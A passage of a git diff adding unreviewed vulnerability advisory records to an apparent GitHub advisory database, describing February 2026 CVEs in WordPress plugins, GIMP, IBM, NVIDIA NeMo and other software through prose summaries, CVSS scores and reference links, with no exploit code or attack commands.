flaw allows an attacker to execute arbitrary code on the user's system by parsing a manipulated file containing malicious serialized data. Exploitation requires user interaction, specifically opening a specially crafted file, which then causes the application to deserialize the malicious data, enabling Remote Code Execution (RCE). This can lead to a complete compromise of the system running Rexroth IndraWorks.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-60038" + }, + { + "type": "WEB", + "url": "https://psirt.bosch.com/security-advisories/BOSCH-SA-591522.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wq4c-m266-6c9g/GHSA-wq4c-m266-6c9g.json b/advisories/unreviewed/2026/02/GHSA-wq4c-m266-6c9g/GHSA-wq4c-m266-6c9g.json new file mode 100644 index 0000000000000..0399e4ed4c474 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wq4c-m266-6c9g/GHSA-wq4c-m266-6c9g.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wq4c-m266-6c9g", + "modified": "2026-02-20T18:31:27Z", + "published": "2026-02-19T18:31:53Z", + "aliases": [ + "CVE-2026-25453" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in mdempfle Advanced iFrame advanced-iframe allows DOM-Based XSS.This issue affects Advanced iFrame: from n/a through <= 2025.10.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25453" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/advanced-iframe/vulnerability/wordpress-advanced-iframe-plugin-2025-10-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T09:16:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wqcv-67x3-mx26/GHSA-wqcv-67x3-mx26.json b/advisories/unreviewed/2026/02/GHSA-wqcv-67x3-mx26/GHSA-wqcv-67x3-mx26.json new file mode 100644 index 0000000000000..6968fdd26c4e3 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wqcv-67x3-mx26/GHSA-wqcv-67x3-mx26.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wqcv-67x3-mx26", + "modified": "2026-02-20T18:31:39Z", + "published": "2026-02-20T18:31:39Z", + "aliases": [ + "CVE-2026-24956" + ], + "details": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Shahjada Download Manager Addons for Elementor wpdm-elementor allows Blind SQL Injection.This issue affects Download Manager Addons for Elementor: from n/a through <= 1.3.0.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24956" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/wpdm-elementor/vulnerability/wordpress-download-manager-addons-for-elementor-plugin-1-3-0-sql-injection-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:39Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wqpx-frj2-7xmj/GHSA-wqpx-frj2-7xmj.json b/advisories/unreviewed/2026/02/GHSA-wqpx-frj2-7xmj/GHSA-wqpx-frj2-7xmj.json new file mode 100644 index 0000000000000..d42635c0b7521 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wqpx-frj2-7xmj/GHSA-wqpx-frj2-7xmj.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wqpx-frj2-7xmj", + "modified": "2026-02-20T18:31:39Z", + "published": "2026-02-20T18:31:39Z", + "aliases": [ + "CVE-2026-26102" + ], + "details": "Incorrect Permission Assignment for Critical Resource in Owl opds 2.2.0.4 allows File Manipulation via a crafted network request.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26102" + }, + { + "type": "WEB", + "url": "https://www.nozominetworks.com/labs/vulnerability-advisories-cve-2026-26102" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-732" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T17:25:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wr9x-74ff-qxqp/GHSA-wr9x-74ff-qxqp.json b/advisories/unreviewed/2026/02/GHSA-wr9x-74ff-qxqp/GHSA-wr9x-74ff-qxqp.json new file mode 100644 index 0000000000000..432445d29590e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wr9x-74ff-qxqp/GHSA-wr9x-74ff-qxqp.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wr9x-74ff-qxqp", + "modified": "2026-02-20T06:30:38Z", + "published": "2026-02-20T06:30:38Z", + "aliases": [ + "CVE-2026-27318" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27318" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T04:15:57Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wrfj-485j-gjpx/GHSA-wrfj-485j-gjpx.json b/advisories/unreviewed/2026/02/GHSA-wrfj-485j-gjpx/GHSA-wrfj-485j-gjpx.json new file mode 100644 index 0000000000000..e02bcab55ff74 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wrfj-485j-gjpx/GHSA-wrfj-485j-gjpx.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wrfj-485j-gjpx", + "modified": "2026-02-19T00:30:28Z", + "published": "2026-02-19T00:30:28Z", + "aliases": [ + "CVE-2019-25352" + ], + "details": "Crystal Live HTTP Server 6.01 contains a directory traversal vulnerability that allows remote attackers to access system files by manipulating URL path segments. Attackers can use multiple '../' sequences to navigate outside the web root and retrieve sensitive configuration files like Windows system files.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25352" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20190105124716/https://www.crystalrs.com/crystal-quality-introduction" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47666" + }, + { + "type": "WEB", + "url": "https://www.genivia.com" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/genivia-crystal-live-http-server-crystal-live-http-server-path-traversal" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T22:16:20Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wrgv-jmfr-c4gr/GHSA-wrgv-jmfr-c4gr.json b/advisories/unreviewed/2026/02/GHSA-wrgv-jmfr-c4gr/GHSA-wrgv-jmfr-c4gr.json new file mode 100644 index 0000000000000..a0d94f20b63a4 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wrgv-jmfr-c4gr/GHSA-wrgv-jmfr-c4gr.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wrgv-jmfr-c4gr", + "modified": "2026-02-17T21:31:14Z", + "published": "2026-02-17T21:31:14Z", + "aliases": [ + "CVE-2025-36379" + ], + "details": "IBM Security QRadar EDR 3.12 through 3.12.23 IBM Security ReaQta uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-36379" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7260390" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-326" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T21:22:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wrqj-g5w9-qq86/GHSA-wrqj-g5w9-qq86.json b/advisories/unreviewed/2026/02/GHSA-wrqj-g5w9-qq86/GHSA-wrqj-g5w9-qq86.json new file mode 100644 index 0000000000000..3aeb4bad3c3c4 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wrqj-g5w9-qq86/GHSA-wrqj-g5w9-qq86.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wrqj-g5w9-qq86", + "modified": "2026-02-17T21:31:14Z", + "published": "2026-02-17T21:31:14Z", + "aliases": [ + "CVE-2025-27901" + ], + "details": "IBM DB2 Recovery Expert for LUW 5.5 Interim Fix 002 IBM Db2 Recovery Expert for Linux, UNIX and Windows is vulnerable to HTTP header injection, caused by improper validation of input by the HOST headers.  This could allow an attacker to conduct various attacks against the vulnerable system, including cross-site scripting, cache poisoning or session hijacking.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-27901" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7259901" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-644" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T20:22:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wrqv-46c5-q67w/GHSA-wrqv-46c5-q67w.json b/advisories/unreviewed/2026/02/GHSA-wrqv-46c5-q67w/GHSA-wrqv-46c5-q67w.json new file mode 100644 index 0000000000000..2fef22de5929b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wrqv-46c5-q67w/GHSA-wrqv-46c5-q67w.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wrqv-46c5-q67w", + "modified": "2026-02-20T21:31:22Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2026-22383" + ], + "details": "Authorization Bypass Through User-Controlled Key vulnerability in Mikado-Themes PawFriends - Pet Shop and Veterinary WordPress Theme pawfriends allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects PawFriends - Pet Shop and Veterinary WordPress Theme: from n/a through <= 1.3.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22383" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/pawfriends/vulnerability/wordpress-pawfriends-pet-shop-and-veterinary-wordpress-theme-theme-1-3-insecure-direct-object-references-idor-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-639" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:37Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wrqv-g27w-82rr/GHSA-wrqv-g27w-82rr.json b/advisories/unreviewed/2026/02/GHSA-wrqv-g27w-82rr/GHSA-wrqv-g27w-82rr.json index 092331961c32b..6de3b3a47acd8 100644 --- a/advisories/unreviewed/2026/02/GHSA-wrqv-g27w-82rr/GHSA-wrqv-g27w-82rr.json +++ b/advisories/unreviewed/2026/02/GHSA-wrqv-g27w-82rr/GHSA-wrqv-g27w-82rr.json @@ -42,7 +42,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-74" + "CWE-74", + "CWE-77" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-wv4q-94jw-h996/GHSA-wv4q-94jw-h996.json b/advisories/unreviewed/2026/02/GHSA-wv4q-94jw-h996/GHSA-wv4q-94jw-h996.json new file mode 100644 index 0000000000000..12b48bed071c4 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wv4q-94jw-h996/GHSA-wv4q-94jw-h996.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wv4q-94jw-h996", + "modified": "2026-02-20T18:31:35Z", + "published": "2026-02-20T18:31:35Z", + "aliases": [ + "CVE-2025-68526" + ], + "details": "Deserialization of Untrusted Data vulnerability in A WP Life Modal Popup Box modal-popup-box allows Object Injection.This issue affects Modal Popup Box: from n/a through <= 1.6.1.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68526" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/modal-popup-box/vulnerability/wordpress-modal-popup-box-plugin-1-6-1-php-object-injection-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wvrh-v9qh-4m3c/GHSA-wvrh-v9qh-4m3c.json b/advisories/unreviewed/2026/02/GHSA-wvrh-v9qh-4m3c/GHSA-wvrh-v9qh-4m3c.json new file mode 100644 index 0000000000000..b13e77080eae7 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wvrh-v9qh-4m3c/GHSA-wvrh-v9qh-4m3c.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wvrh-v9qh-4m3c", + "modified": "2026-02-19T18:31:50Z", + "published": "2026-02-19T18:31:50Z", + "aliases": [ + "CVE-2025-14342" + ], + "details": "The SEO Plugin by Squirrly SEO plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the sq_ajax_uninstall function in all versions up to, and including, 12.4.14. This makes it possible for authenticated attackers, with Subscriber-level access and above, to disconnect the site from Squirrly's cloud service.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14342" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/squirrly-seo/tags/12.4.14/controllers/SeoSettings.php#L616" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3435711" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7ad25948-3265-4c4c-9b99-86f7240600ce?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T07:17:34Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wvvh-pcq5-hc6f/GHSA-wvvh-pcq5-hc6f.json b/advisories/unreviewed/2026/02/GHSA-wvvh-pcq5-hc6f/GHSA-wvvh-pcq5-hc6f.json new file mode 100644 index 0000000000000..c7882935d1b95 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wvvh-pcq5-hc6f/GHSA-wvvh-pcq5-hc6f.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wvvh-pcq5-hc6f", + "modified": "2026-02-18T15:31:25Z", + "published": "2026-02-18T15:31:25Z", + "aliases": [ + "CVE-2025-33250" + ], + "details": "NVIDIA NeMo Framework contains a vulnerability where an attacker could cause remote code execution. A successful exploit of this vulnerability might lead to code execution, denial of service, information disclosure, and data tampering.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33250" + }, + { + "type": "WEB", + "url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5762" + }, + { + "type": "WEB", + "url": "https://www.cve.org/CVERecord?id=CVE-2025-33250" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-94" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-ww2j-3p54-3m69/GHSA-ww2j-3p54-3m69.json b/advisories/unreviewed/2026/02/GHSA-ww2j-3p54-3m69/GHSA-ww2j-3p54-3m69.json new file mode 100644 index 0000000000000..e9668086651a4 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-ww2j-3p54-3m69/GHSA-ww2j-3p54-3m69.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-ww2j-3p54-3m69", + "modified": "2026-02-18T15:31:25Z", + "published": "2026-02-18T15:31:25Z", + "aliases": [ + "CVE-2025-8781" + ], + "details": "The Bookster – WordPress Appointment Booking Plugin plugin for WordPress is vulnerable to SQL Injection via the ‘raw’ parameter in all versions up to, and including, 2.1.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8781" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/bookster/trunk/src/Models/Database/QueryBuilder.php#L133" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3434484" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/1fc5f0ac-3323-4e6c-8900-10e13294ff9a?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T13:16:19Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-ww4h-gqqf-68h9/GHSA-ww4h-gqqf-68h9.json b/advisories/unreviewed/2026/02/GHSA-ww4h-gqqf-68h9/GHSA-ww4h-gqqf-68h9.json new file mode 100644 index 0000000000000..cd2bef6b8b7c6 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-ww4h-gqqf-68h9/GHSA-ww4h-gqqf-68h9.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-ww4h-gqqf-68h9", + "modified": "2026-02-20T18:31:40Z", + "published": "2026-02-20T18:31:40Z", + "aliases": [ + "CVE-2026-2849" + ], + "details": "A vulnerability has been found in yeqifu warehouse up to aaf29962ba407d22d991781de28796ee7b4670e4. Affected by this issue is the function deleteCache/removeAllCache/syncCache of the file dataset\\repos\\warehouse\\src\\main\\java\\com\\yeqifu\\sys\\controller\\CacheController.java of the component Cache Sync Handler. Such manipulation leads to improper access controls. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. This product operates on a rolling release basis, ensuring continuous delivery. Consequently, there are no version details for either affected or updated releases. The project was informed of the problem early through an issue report but has not responded yet.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2849" + }, + { + "type": "WEB", + "url": "https://github.com/yeqifu/warehouse/issues/60" + }, + { + "type": "WEB", + "url": "https://github.com/yeqifu/warehouse/issues/60#issue-3846666902" + }, + { + "type": "WEB", + "url": "https://github.com/yeqifu/warehouse" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347085" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347085" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754428" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-266" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T17:25:58Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-ww95-r66q-v2hh/GHSA-ww95-r66q-v2hh.json b/advisories/unreviewed/2026/02/GHSA-ww95-r66q-v2hh/GHSA-ww95-r66q-v2hh.json new file mode 100644 index 0000000000000..e6e0fe1cba379 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-ww95-r66q-v2hh/GHSA-ww95-r66q-v2hh.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-ww95-r66q-v2hh", + "modified": "2026-02-19T15:30:35Z", + "published": "2026-02-19T15:30:35Z", + "aliases": [ + "CVE-2025-55853" + ], + "details": "SoftVision webPDF before 10.0.2 is vulnerable to Server-Side Request Forgery (SSRF). The PDF converter function does not check if internal or external resources are requested in the uploaded files and allows for protocols such as http:// and file:///. This allows an attacker to upload an XML or HTML file in the application, which when rendered to a PDF allows for internal port scanning and Local File Inclusion (LFI).", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55853" + }, + { + "type": "WEB", + "url": "https://github.com/Vivz13/CVE-2025-55853/tree/main" + }, + { + "type": "WEB", + "url": "https://www.webpdf.de" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T15:16:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wwq9-vrr3-45wf/GHSA-wwq9-vrr3-45wf.json b/advisories/unreviewed/2026/02/GHSA-wwq9-vrr3-45wf/GHSA-wwq9-vrr3-45wf.json new file mode 100644 index 0000000000000..6e32cbecf7097 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wwq9-vrr3-45wf/GHSA-wwq9-vrr3-45wf.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wwq9-vrr3-45wf", + "modified": "2026-02-19T18:31:50Z", + "published": "2026-02-19T18:31:50Z", + "aliases": [ + "CVE-2026-1373" + ], + "details": "The Easy Author Image plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'author_profile_picture_url' parameter in all versions up to, and including, 1.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1373" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/easy-author-image/tags/1.7/easy-author-image.php#L149" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/eaa53088-c383-4315-9871-b4ceb83f5fdb?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T07:17:43Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wx92-h8q5-hfm6/GHSA-wx92-h8q5-hfm6.json b/advisories/unreviewed/2026/02/GHSA-wx92-h8q5-hfm6/GHSA-wx92-h8q5-hfm6.json new file mode 100644 index 0000000000000..5c7e3f33253fb --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wx92-h8q5-hfm6/GHSA-wx92-h8q5-hfm6.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wx92-h8q5-hfm6", + "modified": "2026-02-21T00:31:43Z", + "published": "2026-02-21T00:31:43Z", + "aliases": [ + "CVE-2026-2045" + ], + "details": "GIMP XWD File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the parsing of XWD files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-28265.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2045" + }, + { + "type": "WEB", + "url": "https://gitlab.gnome.org/GNOME/gimp/-/commit/68b27dfb1cbd9b3f22d7fa624dbab8647ee5f275" + }, + { + "type": "WEB", + "url": "https://www.zerodayinitiative.com/advisories/ZDI-26-119" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-787" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T23:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wxg7-qr4v-6w49/GHSA-wxg7-qr4v-6w49.json b/advisories/unreviewed/2026/02/GHSA-wxg7-qr4v-6w49/GHSA-wxg7-qr4v-6w49.json new file mode 100644 index 0000000000000..04a0dff2d8dcb --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wxg7-qr4v-6w49/GHSA-wxg7-qr4v-6w49.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wxg7-qr4v-6w49", + "modified": "2026-02-20T18:31:36Z", + "published": "2026-02-20T18:31:36Z", + "aliases": [ + "CVE-2025-69371" + ], + "details": "Deserialization of Untrusted Data vulnerability in AncoraThemes KindlyCare kindlycare allows Object Injection.This issue affects KindlyCare: from n/a through <= 1.6.1.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69371" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/kindlycare/vulnerability/wordpress-kindlycare-theme-1-6-1-php-object-injection-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:21Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wxhm-86c2-x66c/GHSA-wxhm-86c2-x66c.json b/advisories/unreviewed/2026/02/GHSA-wxhm-86c2-x66c/GHSA-wxhm-86c2-x66c.json new file mode 100644 index 0000000000000..2364f3a755ee7 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wxhm-86c2-x66c/GHSA-wxhm-86c2-x66c.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wxhm-86c2-x66c", + "modified": "2026-02-18T09:31:03Z", + "published": "2026-02-18T09:31:03Z", + "aliases": [ + "CVE-2026-1640" + ], + "details": "The Taskbuilder – WordPress Project Management & Task Management plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 5.0.2. This is due to missing 